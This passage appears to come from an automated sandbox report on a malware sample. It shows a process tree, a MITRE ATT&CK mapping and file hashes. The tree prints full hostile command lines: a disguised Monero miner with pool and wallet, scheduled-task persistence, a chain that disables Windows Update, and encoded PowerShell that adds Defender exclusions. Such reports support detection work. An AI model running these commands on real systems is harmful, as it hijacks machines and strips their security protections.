                                                                                                                        PID:1452
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                          12⤵
                                                                                                                            PID:3480
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                                            12⤵
                                                                                                                              PID:1792
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\logger2.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\logger2.exe"
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:1864
                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 1864 -s 1604
                                                                                                                      8⤵
                                                                                                                      • Program crash
                                                                                                                      PID:3840
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\anytime7.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\anytime7.exe"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks computer location settings
                                                                                                                PID:2544
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                  6⤵
                                                                                                                    PID:3416
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2020
                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
                                                                                                                        8⤵
                                                                                                                          PID:4292
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                            9⤵
                                                                                                                              PID:3624
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                10⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:1496
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                              9⤵
                                                                                                                                PID:4492
                                                                                                                                • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                  10⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:1960
                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                    11⤵
                                                                                                                                      PID:3028
                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                                                        12⤵
                                                                                                                                          PID:488
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\logger2.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\logger2.exe"
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1932
                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 1932 -s 1600
                                                                                                                                  8⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:4856
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\logger2.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\logger2.exe"
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks computer location settings
                                                                                                                            PID:2472
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                              6⤵
                                                                                                                                PID:2908
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4184
                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
                                                                                                                                    8⤵
                                                                                                                                      PID:1908
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                        9⤵
                                                                                                                                          PID:1364
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                            10⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:3300
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                          9⤵
                                                                                                                                            PID:1652
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                              C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                              10⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2568
                                                                                                                                              • C:\Windows\System32\conhost.exe
                                                                                                                                                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                11⤵
                                                                                                                                                  PID:2012
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                    12⤵
                                                                                                                                                      PID:928
                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                      C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                                                                      12⤵
                                                                                                                                                        PID:4396
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 1520
                                                                                                                                              7⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:3464
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\njtxLurSSstAnBp60ScL4OzD.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\njtxLurSSstAnBp60ScL4OzD.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:2960
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 2020
                                                                                                                                      3⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:1068
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\zHHMLouApJwoLxDCuvVJ1LGE.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\zHHMLouApJwoLxDCuvVJ1LGE.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:656
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2960 -ip 2960
                                                                                                                                  1⤵
                                                                                                                                    PID:1184
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4580 -ip 4580
                                                                                                                                    1⤵
                                                                                                                                      PID:3760
                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 416 -p 1012 -ip 1012
                                                                                                                                      1⤵
                                                                                                                                        PID:2836
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4580 -ip 4580
                                                                                                                                        1⤵
                                                                                                                                          PID:2156
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4580 -ip 4580
                                                                                                                                          1⤵
                                                                                                                                            PID:1084
                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            PID:116
                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                              2⤵
                                                                                                                                                PID:4596
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 600
                                                                                                                                                  3⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:3696
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4580 -ip 4580
                                                                                                                                              1⤵
                                                                                                                                                PID:1184
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4596 -ip 4596
                                                                                                                                                1⤵
                                                                                                                                                  PID:4772
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4580 -ip 4580
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4988
                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 476 -p 5036 -ip 5036
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1740
                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                      1⤵
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      PID:3124
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:2820
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 600
                                                                                                                                                          3⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:4604
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4536
                                                                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2656
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4580 -ip 4580
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1932
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2820 -ip 2820
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4736
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2908 -ip 2908
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1512
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4580 -ip 4580
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3476
                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 508 -p 1932 -ip 1932
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:116
                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 524 -p 1864 -ip 1864
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3592
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4580 -ip 4580
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2152
                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Accesses Microsoft Outlook profiles
                                                                                                                                                                      • outlook_office_path
                                                                                                                                                                      • outlook_win_path
                                                                                                                                                                      PID:3928
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4580 -ip 4580
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3172
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4012
                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:1304
                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:2552
                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:752
                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4168
                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:4072
                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4532
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\hfwjjfg
                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\hfwjjfg
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                    PID:4136
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 328 -ip 328
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4148
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 328 -ip 328
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3476
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 328 -ip 328
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:2300
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 328 -ip 328
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4220
                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:412
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:3384
                                                                                                                                                                                            • C:\Windows\System32\conhost.exe
                                                                                                                                                                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              PID:1932
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8AYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGEAaQBtACMAPgA="
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:2212
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:1764
                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                      sc stop UsoSvc
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:684
                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                      sc stop WaaSMedicSvc
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:1812
                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                      sc stop wuauserv
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:3092
                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                      sc stop bits
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:3124
                                                                                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    C:\Windows\System32\conhost.exe "pproonliew"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:3668
                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                      C:\Windows\explorer.exe bqolgaggpbwmexx0 6E3sjfZq2rJQaxvLPmXgsCZAIMpmPntHEIWDH08V2Q38oDzy/Cqli7gBy2CefOtpbDvXGR4glPHek2nDkDQAVV/YxKxdt9bbVNHKfcSH/EJYtaySlAyCqJ7h97nhbXSjqD4Ok41Gq3Klge2pYVnV7Q8XpeVQM0cmbp9X4u8VrOQ6nHXt/Mic+XgY1+rzfSckHm5QSoKLVon/NUc3ECYCbDxjzLsuy4EPZh8t/tiXxeQk5SxDm2JJDS+9uYI46CRm2Dbbac+TA/HjhXxoqovZMJHpjwU9IVCv0+m8YWp+D+DqFTTcT2UkYTsWpvt+GKkxP9aPtghph1/KQtGcU5s/n4Y3q3wEWQay1rNS0x9a+34yU7TYlVgV6pKLCkgMrTtZ
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1596
                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:3188
                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:3276
                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:3508
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\rEOjcbxbCuqHvfnAw\sCpvQSojPTfRfLZ\UzrKuwT.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\rEOjcbxbCuqHvfnAw\sCpvQSojPTfRfLZ\UzrKuwT.exe Qa /site_id 525403 /S
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:2104

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                        Execution

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                        3
                                                                                                                                                                                                        T1031

                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1060

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                        6
                                                                                                                                                                                                        T1112

                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1089

                                                                                                                                                                                                        Impair Defenses

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1562

                                                                                                                                                                                                        File Permissions Modification

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1222

                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1130

                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1081

                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                        5
                                                                                                                                                                                                        T1012

                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                        5
                                                                                                                                                                                                        T1082

                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1120

                                                                                                                                                                                                        Process Discovery

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1057

                                                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1018

                                                                                                                                                                                                        Collection

                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1005

                                                                                                                                                                                                        Email Collection

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1114

                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1102

                                                                                                                                                                                                        Impact

                                                                                                                                                                                                        Service Stop

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1489

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2ddf692eaa4863ffa6a94e6b26c4e596

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8b024889391a037b62ca3553c05bbd130fd55e15

